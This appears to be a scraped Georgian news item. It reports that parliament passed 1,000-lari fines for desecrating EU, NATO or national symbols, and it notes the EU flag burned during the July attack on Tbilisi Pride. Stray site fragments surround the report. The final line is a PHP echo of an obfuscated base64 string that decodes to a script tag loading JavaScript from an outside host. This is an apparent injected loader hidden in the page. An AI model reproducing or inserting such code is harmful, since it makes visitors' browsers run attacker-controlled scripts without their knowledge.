celsiusi
ავერსი საქკაბელი
პარლამენტმა ევროკავშირის, ნატოსა და სხვა შესაბამისი საერთაშორისო ორგანიზაციის ოფიციალური სიმბოლოს შებღალვისთვის ჯარიმების დაწესებას მხარი მესამე მოსმენით დაუჭირა. 
 
კანონპროექტს მხარი 81-მა დეპუტატმა დაუჭირა. ამით ცვლილებები საქართველოს ადმინისტრაციულ სამართალდარღვევათა კოდექსში შევიდა და ადმინისტრაციული პასუხისმგებლობის დაწესებას ითვალისწინებს. 
 
"ევროპის კავშირის, ჩრდილოატლანტიკური ხელშეკრულების ორგანიზაციის, სხვა შესაბამისი საერთაშორისო ორგანიზაციის ოფიციალური სიმბოლოს ან შესაბამისი სახელმწიფოს ეროვნული სიმბოლოს შებღალვისთვის. ასეთი ქმედების ჩამდენი პირი 1 000 ლარით დაჯარიმდება". 
 
კანონპროექტის ერთ-ერთი ინიციატორი ნიკოლოზ სამხარაძეა. ასევე პარლამენტის უკვე ყოფილი თავმჯდომარე კახა კუჭავა. 
 
აღსანიშნავია, რომ თბილისი პრაიდის ჩაშლის და მედიის წარმომადგენლებზე თავდასხმის დროს, ძალადობრივმა და ჰომოფობიურმა ჯგუფებმა, 5-6 ივლისს ევროკავშირის დროშა ორჯერ ჩამოხიეს და დაწვეს. 
1027
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");